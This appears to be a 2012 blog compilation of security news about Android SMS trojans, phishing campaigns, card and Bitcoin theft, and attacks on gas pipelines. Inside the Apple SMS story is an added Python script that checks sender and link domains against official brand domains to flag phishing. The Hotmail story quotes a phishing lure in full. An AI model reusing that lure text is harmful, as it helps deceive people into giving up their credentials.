The large number of malicious websites designed to infect Android devices with the well-known Android:FakeInst SMS Trojan has made Avast security experts issue another warning to alert users of its presence. They also advise smartphone owners to beware of shady-looking alternative Android app markets.

Researchers have found several domains, such as t2file.net and uote.net, which store at least 25 new apps that mask the piece of malware.

After users are lured onto these websites, they’re presented with a phony Downloader program. The truly evil thing about this app is that it tells the victim that the operation may cost money, but the Quit button doesn’t work.

Once the installation process begins, there’s nothing you can do but click on the Agree or OK buttons. Of course, there are methods to stop the task, but to the untrained user it appears as if he/she has no other choice.


What is even more worrying is the fact that once one of these buttons is pressed, an SMS to a premium rate number is already sent out. To make matters worse, the Trojan contains premium numbers for around 60 different countries worldwide, which means that if the victim isn’t located in Antarctica, he/she will most likely end up with an inflated phone bill.

In order to prevent experts from analyzing the malware, its creators have used AES encryption to make the file inaccessible.

Each SMS sent out by Android:FakeInst costs around $4 (3 EUR), which means that the cybercriminals behind this operation can earn considerable amounts of money from users who make the mistake of downloading software from alternative markets.

“Never trust weird looking alternative markets and always check the app permissions. If you’ve downloaded a game that asks for SMS and Phone calls permissions, it probably means that someone is about to “play you” instead,” Avast’s Alena Varkočková explained.


softpedia.com

Fake Android Antivirus Served via Twitter Spam

Security researchers warn that Twitter is being flooded with shady-looking posts that contain links to websites hosted on .tk domains. These websites hide malicious elements that target not only PC users, but also Android owners.

GFI Labs experts report that while PC users are served broken .jar files, Android customers are tricked into installing a fake antivirus application whose icon mimics that of Kaspersky products.

So let’s take a look at how these schemes work.

First, the cybercriminals post tweets in Russian or English that advertise all sorts of materials, mainly adult content. All the tweets contain a link to a site such as “good-graft.tk.”


Once clicked, the links open a Russian site that’s designed for both smartphone and computer owners. Depending on the device from which the website is accessed, the potential victim is served a file called VirusScanner.jar (for PC), or VirusScanner.apk (for Android).

As mentioned before, experts revealed that the .jar file seems to be broken, since an error is displayed when it is executed. However, this may change at any time, so internauts should be wary when presented with such an element.


VirusScanner.apk is a rogue antivirus application which displays the Kaspersky logo when it is installed.

Identified as Trojan.Android.Generic.a by GFI’s VIPRE Mobile Security, the piece of malware reveals its true purpose during the installation process when it asks permission to access phone calls, messages and even services that cost money.

We strongly advise you to refrain from clicking on links contained in Twitter posts if they look suspicious. Furthermore, site addresses that end in .tk are usually a good indicator of a malicious plot.

On the other hand, even if you do end up on a shady site, at least make sure you don’t install anything that’s pushed to your device.

Finally, although many argue that mobile threats are not yet so popular, users should learn to treat their smartphones just as they do their computers and install antivirus solutions from legitimate and reputable companies.


softpedia.com 

Phishers to Hotmail Users: Your Account Has Been Blocked



Hotmail customers are advised to be on the lookout for emails entitled “E-mail account alert!” which notify them that their accounts have been blocked. These messages hide a link which points to a malicious website that urges the potential victim to provide his login credentials.

Here’s part of the shady notification, provided by the folks from Hoax Slayer:

This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.

Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?

We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link]


If you have already confirmed your account information then please disregard this message.



Users who fall for the scam and click on the shady link are taken to a website that almost perfectly replicates the genuine Windows Live login webpage. Once the username and password are provided, the unsuspecting victim is taken to the legitimate website.

This might make him/her believe that the login simply failed. When they do sign on to their account, they may think that the re-activation process was successful.

While it is true that cybercriminals use compromised accounts to send out spam and other malicious notifications, internauts shouldn’t rush to trust every email they receive.

On the contrary! With all the malevolent plots making the rounds online, users should see every alert as a potential threat.

There are a few simple steps that can be taken to verify a notification’s legitimacy. First, look at the sender’s email address. Even though many of them are spoofed to look like they originate from a legitimate address, in some cases you will see that the sender is something like hotmail-notifications@yahoo.com.

The name of the site that hides behind the link is also very important. If the hyperlink points to any other URL than the company’s official one, it’s most likely a scam.

softpedia.com

Card Information Stolen in Global Payments Incident Used for Fraud



Union Savings Bank (USB) representatives noticed that some of the debit cards issued by the financial institution were used to commit fraud that leveraged prepaid cards. They determined that the account information utilized by the fraudsters was stolen as a result of the Global Payments incident.

According to security journalist Brian Krebs, USB notified Visa after realizing that the private school's cafe where most of the cards were used was actually a Global Payments customer.

Shortly after, the bank was contacted by Tony Higgins, a fraud investigator who worked for Safeway Inc, a grocery store chain in Nevada and Southern California.

The institution learned from Higgins that the crooks purchased Safeway prepaid cards from the stores. Onto the magnetic stripes of these cards they encoded the account information stolen from USB.


To make their trail hard to follow, they used them to purchase other prepaid cards with which they bought electronics and expensive products.

The investigator told Doug Fuller, USB’s chief risk officer, that the fraudsters were committing their crimes mostly in Las Vegas, but also in nearby states. He believed that they were actually from Los Angeles and San Diego, but came to Vegas to make use of the payment cards.

Apparently, around 1,000 Union Savings Bank debit accounts were compromised as a result of the Global Payments breach, the losses suffered by the organization totaling up to $75,000 (57,000 EUR), plus another $10,000 (7,600 EUR) which it spent on reissuing cards.

Higgins told the risk officer that the Bank of Oklahoma and Fulton Bank were also on the list of victims.

While Global Payments representatives hold on to their side of the story, claiming that no more than 1.5 million accounts have been compromised, others believe that more than 7 million card owners may be exposed.


softpedia.com

Sunday, 13 May 2012

Pentagon boosts contractor cybersecurity program

The US Defense Department invited all of its eligible contractors on Friday to join a previously restricted information-sharing pact aimed at guarding sensitive Pentagon program data stored on private computer networks.

The Pentagon predicts that as many as 1,000 defense contractors may join a voluntary effort to share classified information on cyber threats under an expansion of a first-ever initiative to protect computer networks.

The effort, known as the Defense Industrial Base ("DIB") program, is a voluntary information-sharing program in which the Department of Defense shares "unclassified indicators and related, classified contextual information" about cyber-attacks and threats with defense contractors.



In exchange, defense contractors report known intrusions and can receive forensics analysis and damage assessments from the government after those attacks. In an optional part of the program, the DIB Enhanced Cybersecurity Services, the government shares additional classified threat and technical data with defense contractors and Internet service providers.

If the Pentagon’s effort proves successful in safeguarding defense contractors from cyber attacks, the administration may enlarge the program to companies in 15 other critical infrastructure categories through the Department of Homeland Security.

More than 2,000 companies qualify and the membership rolls will be expanded on a first-come, first-served basis, the official said. At the program's entry level, the Pentagon will give participants unclassified "indicators" and classified "contextual information," as well as suggested measures for addressing cyber threats.

Volunteer companies must sign a standardized bilateral framework pact that calls for sharing "to the greatest extent possible" for the clearest understanding of cyber threats, according to an interim final rule published Friday in the Federal Register.

Recently, the security of critical infrastructure companies was put into the spotlight again when reports surfaced about a series of cyber attacks targeting the natural gas industry.

“The increasing connectedness of infrastructure not only makes U.S. utility companies more vulnerable to cyber-security attacks but increases the cascading effect an attack can have on other infrastructure sectors and capabilities,” said Chris Petersen, CTO of LogRhythm.

“A fundamental challenge utilities face is that supervisory control and data acquisition (SCADA) systems were not designed to be secure. Much of the existing infrastructure was developed and implemented prior to the rise of the Internet. Security was most often thought of in the physical sense.”

17-year-old teenager arrested over TeamPoison hacking attacks


A teenage boy has been arrested on suspicion of being a member of "TeamPoison", a computer hacking group that has claimed responsibility for 1,400 offences including an attack on the phone system of Scotland Yard's counter-terrorism unit last month. These include attacks on the United Nations, the UK Anti-Terrorist Hotline, MI6 and RIM, as well as politicians including Nicolas Sarkozy and Tony Blair.

The boy, who police suspect used the hacker nickname 'MLT' and was a spokesman for TeamPoison, was interviewed at a local police station on offences under the Computer Misuse Act on Wednesday. The arrest is part of an ongoing investigation by the Police Central e-Crime Unit (PCeU) division of the Metropolitan Police into various hacking gangs who have made headlines in the last year or so.

TeamPoison’s highest-profile attack was mounted against Scotland Yard’s counter-terror hotline last month; the group has also claimed responsibility for distributed denial-of-service attacks against banks in collaboration with Anonymous, another “hacktivist” group with similar anti-corporate and anti-authority politics.

Cyber Attacks on gas pipeline linked to China



The spear-phishing attacks laying siege to networks in the natural gas pipeline industry apparently are being carried out by the same group that hacked RSA security last year. The attacks, which have been occurring since late this past March, have targeted several of the country's natural gas pipeline companies.

According to U.S. officials, it's unclear if a foreign power is trying to map the gas systems or if hackers are attempting to harm the pipelines. A previous attack on the oil and gas sector seemed to originate in China.

DHS supplied the pipeline industry and its security experts with digital signatures, or "indicators of compromise" (IOCs). Those indicators included computer file names, computer IP addresses, domain names, and other key information associated with the cyberspies, which companies could use to check their networks for signs they’ve been infiltrated.

DHS officials and a spokesman have acknowledged they are working with the FBI to find out who may be behind the intrusions and malicious emails. The Monitor reports that some investigators now believe that the campaign is tied to another attack last year against cybersecurity company RSA, which the head of the National Security Agency told Congress could be traced back to China.

The group responsible for the RSA attacks has also been linked to several previous hacking incidents around the globe. Politico reports that these recent attacks, combined with the devastating 2010 natural gas pipeline explosion in California, illustrate the potential dangers of the rapidly expanding gas pipeline network.

The oil and gas sector has been targeted before. In February 2011 the computer security firm McAfee discovered a computer intrusion labeled "Night Dragon" that was traced to China. As part of that attack, individuals tried to obtain sensitive data and financial documents from the oil and gas companies about bids and future drilling exploration projects.

Bitcoin Exchange Hacked, More than 18,000 Bitcoins Stolen


Bitcoinica, a Bitcoin exchange started by 17-year-old Zhou Tong, has been shut down for a security investigation. It’s believed that at least 18,000 BTC ($90,000 or 68,000 EUR) have been stolen.
News of the hack was posted this morning by Bitcoinica's founder, Zhou Tong:
"Today, we have discovered a suspicious Bitcoin transaction that doesn't seem to be initiated by any one of the company owners. Some of them are not online at the moment so this is not conclusive.
Suspicious transaction:

{
"account" : "",
"address" : "182tGyiczhXSSCTciVujNRkkMw1zQxUVhp",
"category" : "send",
"amount" : -18547.66867623,
"fee" : 0.00000000,
"blockhash" : "00000000000003f6bfd3e2fcbf76091853b28be234b5473a67f89b9d5bee019c",
"blockindex" : 1,
"txid" : "7a22917744aa9ed740faf3068a2f895424ed816ed1a04012b47df7a493f056e8",
"time" : 1336738723
},

We have contacted Rackspace to suspend all our servers and lock down our accounts. All your trading and financial data is safe (as far as I know), apart from the Bitcoin loss. Thank you for your patience and understanding while we investigate this issue in detail."


Many criticized the site’s owners for keeping such amounts of currency on hosted systems instead of using offline transactions and disconnecting the wallets from the trading infrastructure, especially after the Linode incident.
Zhou maintains that, apart from the Bitcoins, the database was also stolen, but the passwords were salted and hashed using bcrypt. Zhou mentions that the stolen bitcoins are likely to be reimbursed by Bitcoinica in USD. This isn’t the first time Bitcoinica has been broken into: a few months ago, the Bitcoinica wallet that stored the funds was emptied after a breach at its then web host, Linode.


Saturday, 12 May 2012

“Diablo 3 Free Download” Scams Fill the Pockets of Cybercriminals



Cybercriminals and online fraudsters are well aware of the fact that many users will want to download Diablo III, the latest version of the famous RPG game. That is why they are trying to lure unsuspecting gamers to their malicious sites with “Diablo 3 free download” offers.

In fact, as Trend Micro security experts warn, many of the Google results that appear after searching for “diablo 3 free download” actually point to shady sites.

Users who fall for these traps and click on the result links are taken to sites that display a big “Download Now” button. Once it is pressed, another website appears, requesting the user to complete an “offer” to gain access to the highly desired content.

These offers, better known as the classic affiliate survey scams, include topics such as “Discover your fortune”, “iWinners”, or something for the Spanish speakers which reads, “Recibe la major musica, videos e imagines directamente a tu movil.”

Each time someone completes one of these surveys, the crooks earn a certain amount of money from shady online marketing companies.

In another scenario, the potential victim is taken to a website that’s promoted as a YouTube page. Here, he/she is presented with instructions that must be followed in order to download the beta version of Diablo III for free.


As in many similar cases, Facebook is involved. The scheme must be shared, Liked, and posted on three different pages of the social media website.

Only after these steps are completed does the fun begin. Users are asked to answer a number of questions as part of a survey to unlock the content.

Of course, Diablo III is not the first game that’s used in malicious schemes, Grand Theft Auto and World of Warcraft being just a few of the many examples.

Gamers are advised to purchase the game only from trusted sources. Also it’s recommended that they stay away from “Diablo 3 free download” links.


 softpedia.com

UGNazi Hackers Attack Ed.Gov After Being Released

Hackers from the UGNazi collective went silent for a while, but now they have acquired another target, on which they have launched a distributed denial-of-service (DDoS) attack.

The break seems to have been caused by the fact that a number of the group’s members have been arrested.

“We were questioned for 48 hours about UGNazi and other ‘cyber crimes’ performed by us, but with almost no proof to back up their claims that we have done what they claim, we were released with no charges as of now, but we are still under investigation,” ThaCosmo told Softpedia.

However, soon after their release, they picked up from where they left off and took down the website of the US Department of Education (ed.gov).

“We will continue what we believe is right no matter what law enforcement does to us, the UG boat will not sink,” the hacker explained.

We asked him if there was any particular reason for targeting the site of the Department of Education.


“Ed.gov is the Department of Education, which is supposed to teach the children of America right from wrong, as well as teach them how the world works and so on. Nowadays education in America has dropped so low that it’s better to stay home and read a book than go to school,” he added.

“Schools are closing down due to budget cuts but then again Obama is still getting paid and people with power are getting millions in their pockets.”

According to the hacker, the site was offline for almost 6 hours, the attack being scheduled to continue in the morning.

Also, we’ve learned that one of the two Norwegian hackers arrested a few days ago in connection to the SOCA attack is actually a member of the team. The other one is a member of a group called Dotnet[expletive]-ers, accused of the attacks on the Norwegian sites.

“Well, one of the members of UGNazi is one of the 2 Norwegian hackers, but the group ‘Dotnet[expletive]-ers’ were just a bunch of Anon kids who wanted to use our botnet for their attacks,” ThaCosmo said.

“Dotnet[expletive]-ers have nothing to do with this except one of the members was our coder and their members blamed it all on us [the attacks on the sites from Norway] from what we have heard so far. They were from Anonymous. Anonymous is afraid to take their own blame. Not surprising.”


softpedia.com

Make Your Mother Happy by Buying Her a Rolex, Spam


As Mother’s Day approaches for millions of people worldwide, spammers focus their attention on users who want to celebrate this special day by offering gifts.

Many people want to express their love for their mothers by purchasing watches, gift cards, flowers, and even antiques. Fraudsters are well aware of this, so they’ve launched massive spam campaigns to promote their shady products.

McAfee experts have come across such spammy emails. Apparently they come in many shapes, carrying subjects such as “Make your mother happy”, “Mother’s day stock”, “Mother’s Day inventory”, “All about MOM”, “Mother’s Day extension” and many others.

In most cases, the offers are well designed, being accompanied by pictures and text written in big red letters to make them more attractive.

Many of the variants advertise “luxury replicas” or Rolex watches, flowers, and other types of gifts, everything at low prices.

However, security researchers warn that the links contained in these messages point to shady websites such as watchesbylr.com, lrwatchco.com, lrwristwatches.com, and lrluxurywatch.com.


Internet users who order products from these sites expose themselves to a number of threats that may lurk behind the attractive-looking pictures.

So, let’s take a look at the possible scenarios. First of all, you may actually receive the product you have ordered, but keep in mind that purchasing something from the Internet that’s advertised via spam is like buying something off the back of a truck.

Just think of those Chinese iPhones that look like the real thing, but they come with VGA cameras.

The second scenario is the one in which the link points to a site programmed to serve malware to its visitors. You can easily end up with a nasty Trojan that silently waits for you to enter the password to your online banking account.

Finally, if you provide payment information to these sites, you may find that you’ve actually handed over your credit card details to some crooks that could later use them to make fraudulent purchases.

softpedia.com

Thursday, 10 May 2012

Apple Contest SMS Messages Carry Shady Link



Fake contests that purport to be sponsored by a reputable company are not new, but now, cybercriminals that launch such campaigns have turned their attention to mobile phone owners. In one instance, to ensure the success of the operation, they use the name and reputation of Apple.

“Congratulations, Your entry into our contest last month made you a WINNER! Goto www.apple.com.textwon.com to claim your prize! You have 24 hours to claim,” reads the message found by Sophos researchers.

While at first glance it may seem that the link points to the genuine Apple site, if we take a closer look we see that “apple.com” is actually a subdomain of the “textwon.com” website.
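The two checks the Hotmail and Apple stories recommend (does the sender's address belong to the brand's domain, and does every link really land on that domain) as an added example, not Softpedia's, Hoax-Slayer's or Sophos's code. The brand-to-domain map, the "last two labels" rule for the registrable domain and the placeholder Hotmail link are assumptions; the SMS text is the one quoted above.

```python
"""Sender-domain and link-domain checks for notification-style phishing.
Added example, not Softpedia's, Hoax-Slayer's or Sophos's code. The
OFFICIAL_DOMAINS map and the registrable-domain rule (last two labels of
the host) are simplifying assumptions; production code would consult the
Public Suffix List instead."""
import re
from urllib.parse import urlparse

# Assumed brand -> official domain mapping for this example.
OFFICIAL_DOMAINS = {"hotmail": "hotmail.com", "apple": "apple.com"}

# Bare or schemed hostnames with an optional path, e.g. 'www.apple.com.textwon.com'.
URL_RE = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/[^\s]*)?", re.I)


def host_of(url: str) -> str:
    """Hostname of a URL; a scheme is assumed when the text omits it."""
    if "://" not in url:
        url = "http://" + url
    return urlparse(url).hostname or ""


def registrable_domain(host: str) -> str:
    """Simplified rule: the last two labels. 'www.apple.com.textwon.com'
    becomes 'textwon.com', exposing 'apple.com' as a mere subdomain."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def link_matches_brand(url: str, official_domain: str) -> bool:
    """True only if the link lands on the brand's own registrable domain."""
    return registrable_domain(host_of(url)) == official_domain


def sender_matches_brand(address: str, official_domain: str) -> bool:
    """Sender check: 'hotmail-notifications@yahoo.com' is yahoo.com, not Hotmail."""
    domain = address.rsplit("@", 1)[-1].strip(">")
    return registrable_domain(domain) == official_domain


def check_message(sender: str, body: str, brand: str) -> dict:
    """Combine both checks; any link off the official domain is reported.
    An empty sender (an SMS has none) skips the sender check."""
    official = OFFICIAL_DOMAINS[brand]
    links = URL_RE.findall(body)
    bad_links = [u for u in links if not link_matches_brand(u, official)]
    sender_ok = sender_matches_brand(sender, official) if sender else True
    return {
        "sender_ok": sender_ok,
        "bad_links": bad_links,
        "suspicious": (not sender_ok) or bool(bad_links),
    }


# Constructed samples: the SMS text is the one quoted in the Apple story; the
# Hotmail link is a placeholder, since the article shows it only as "[Link]".
APPLE_SMS = ("Congratulations, Your entry into our contest last month made you a "
             "WINNER! Goto www.apple.com.textwon.com to claim your prize!")
HOTMAIL_BODY = ("We'll ask you to login to our secured activation page by following "
                "the link below: http://live-reactivation.example.net/login")

if __name__ == "__main__":
    print(check_message("", APPLE_SMS, "apple"))
    print(check_message("hotmail-notifications@yahoo.com", HOTMAIL_BODY, "hotmail"))
```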

After investigating the domain, experts determined that it was registered on May 4, 2012.

“The actual contact information for who registered the domain is hidden behind a domain privacy service, but the A-Record IP address of the domain is linked with others that are known to have hosted malware, scams, adware and fake anti-virus in the past,” Graham Cluley of Sophos reports.


Users who fall for the scam and click on the link are redirected to one of the many shady websites, depending on their location. However, in most cases, the victim is taken to a site which promises a free iPad, or other fancy gadget, in return for the completion of a classic survey.

As always, no one ever wins anything, except for the fraudsters, who earn a certain amount of money each time someone falls for the trap.

In some scenarios, after completing the survey, the users are requested to provide a mobile phone number which is used by the cybercrooks to sign them up for unsolicited premium rate services.

These types of schemes are not uncommon on social media websites and many have learned to avoid them, but now, we recommend that you also take a closer look at shady-looking offers received via SMS.


 softpedia.com

Tatanga Malware Platform Used in Fraud Insurance Scam



Cybercriminals have come up with a new way of duping unsuspecting bank customers into handing over their funds. They promote shady insurance that supposedly protects against losses caused by online banking fraud.

Trusteer experts detail the way these attacks work and how they leverage the Tatanga malware platform to ensure the success of the malicious campaign.

First, the malware informs the victim of the allegedly free offer through content injected into the web browser. Then, the potential victim is presented with a fake insurance account whose value is purportedly equal to the amount of money currently present in the bank account.

In order to activate the new account, the user is requested to authorize the transaction by entering the one-time password the bank sends via SMS to his/her mobile device.

In reality, the “insurance account” is a normal account that belongs to a money mule who is involved in the scheme. When users authorize the so-called activation, they are actually authorizing a fund transfer from the victim to the mule.


The screenshot provided by Trusteer shows a notification pushed by Tatanga that's designed to target Spanish speakers. The parts that appear in quotes are replaced with the victim’s data during the attack.

Experts have determined that the crooks steal the entire balance of the victim’s bank account if it is between 1,000 EUR ($1,300) and 5,000 EUR ($6,500). If the balance exceeds 5,000 EUR, they take only 5,000 EUR.

“Once they have compromised an endpoint, the ability of Tatanga and the other cybercrime platforms to commit online fraud is limited only by the imagination of criminals. As this latest scheme illustrates fraudsters do not lack creativity when it comes to developing new methods that trick victims into authorizing fraudulent transactions,” Trusteer’s Amit Klein concluded.


softpedia.com

DHS Warns of Attacks on Oil and Natural Gas Companies


In its April 2012 Monthly Monitor, the Department of Homeland Security’s (DHS) Industrial Control Systems – Cyber Emergency Response Team (ICS-CERT) warns that a number of cyberattacks have been identified to target companies from the natural gas pipeline sector.

The report reveals that the spear-phishing campaign dates back to as early as December 2011, a single group being suspected of coordinating the entire operation.

After analyzing the threat, ICS-CERT has concluded that the attacks haven’t focused on specific employees, malicious emails being sent to a variety of personnel from within the companies.

Furthermore, the notifications are designed to appear as if they are being sent by someone who is a trusted member of the organization. This technique usually ensures a higher rate of success for such operations.

“ICS-CERT has issued an alert (and two updates) to the US-CERT Control Systems Center secure portal library and also disseminated them to sector organizations and agencies to ensure broad distribution to asset owners and operators,” the report reads.


“ICS-CERT Alerts are intended to provide early warning indicators of threats and vulnerabilities for the community to act upon quickly. While ICS-CERT strives to make as much information publicly available as possible, the indicators in these alerts are considered sensitive and cannot be disseminated through public or unsecure channels.”

The agency is currently working with a number of targeted organizations to assess the extent of the damage and remove the infections from their networks.

ICS-CERT has conducted briefings across the US; until a detailed mitigation advisory is released, oil and natural gas companies are advised to deploy “Defense in Depth” practices.

Firms are also advised to educate their employees and their customers on the risks posed by social engineering and spear-phishing attacks.


softpedia.com

Chinese Military Officials Visit "Sensitive" US Facilities

A number of Chinese military officials, led by the country’s Minister of Defense, General Liang Guanglie, arrived in the US on Friday. During their stay, they are scheduled to visit a number of sensitive US military locations.

According to The Free Beacon, the facilities are the Naval Amphibious Base Coronado, the U.S. Southern Command, Camp Lejeune in North Carolina, Seymour Johnson Air Force Base, and the West Point Military Academy.

Guanglie has already toured a Navy destroyer and a ship-driving simulator, and on Monday he met with Defense Secretary Leon Panetta.

He will also meet the Marines at Camp Lejeune and will be shown the F-15E Strike Eagle and a US landing craft.

Chinese military affairs specialist Richard Fisher believes that these last two items raise the most concern, because the People’s Liberation Army (PLA) could use the information to enhance its own offensive capabilities.

Furthermore, he stresses that the theme of this visit, cooperation on disaster relief, has nothing to do with the F-15E unit.

F-15 jets have been used by the US in most major conflicts, and Fisher claims that “the PLA would dearly appreciate any pointers on how to better use its Su-30MKK, JH-7A, and J-16 strike fighters against Taiwan, Japan, and the Philippines.”

The specialist is not the only one concerned about this visit. Many argue that the National Defense Authorization Act of 2000, which prohibits the exhibition of key facilities to the Chinese military, might be violated.

On the other hand, Pentagon representatives state that “the delegation is not stopping at any location that has not been appropriately cleared for this visit.”

The 2000 law designates 12 areas that could create a national security risk if exposed to the Chinese. These areas include nuclear operations, advanced logistical operations, chemical and biological defense capabilities, and operations related to surveillance and reconnaissance.

softpedia.com